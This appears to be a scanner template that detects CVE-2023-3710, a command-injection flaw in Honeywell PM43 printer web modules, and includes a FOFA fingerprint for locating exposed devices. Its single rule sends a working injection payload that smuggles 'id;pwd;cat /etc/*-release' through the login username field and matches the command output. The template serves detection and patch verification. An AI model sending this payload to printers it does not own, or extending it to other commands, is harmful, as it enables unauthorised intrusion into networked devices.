id: CVE-2023-3710

info:
  name: Honeywell PM43 Printers - Command Injection
  author: win3zz
  severity: critical
  verified: true
  description: |
    Improper Input Validation vulnerability in Honeywell PM43 on 32 bit, ARM (Printer web page modules) allows Command Injection.This issue affects PM43 versions prior to P10.19.050004. Update to the latest available firmware version of the respective printers to version MR19.5 (e.g. P10.19.050006)
    FOFA: body="/main/login.lua?pageid="
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2023-3710
    - https://github.com/vpxuser/CVE-2023-3710-POC
    - https://twitter.com/win3zz/status/1713451282344853634
  tags: cve,cve2023,honeywell,pm43,printer,iot,rce
  created: 2023/10/17

rules:
  r0:
    request:
      method: POST
      path: /loadfile.lp?pageid=Configure
      body: username=x%0aid;pwd;cat+/etc/*-release%0a&userpassword=1
    expression: response.status == 200 && "((u|g)id|groups)=[0-9]{1,4}\\([a-z0-9]+\\)".bmatches(response.body)
expression: r0()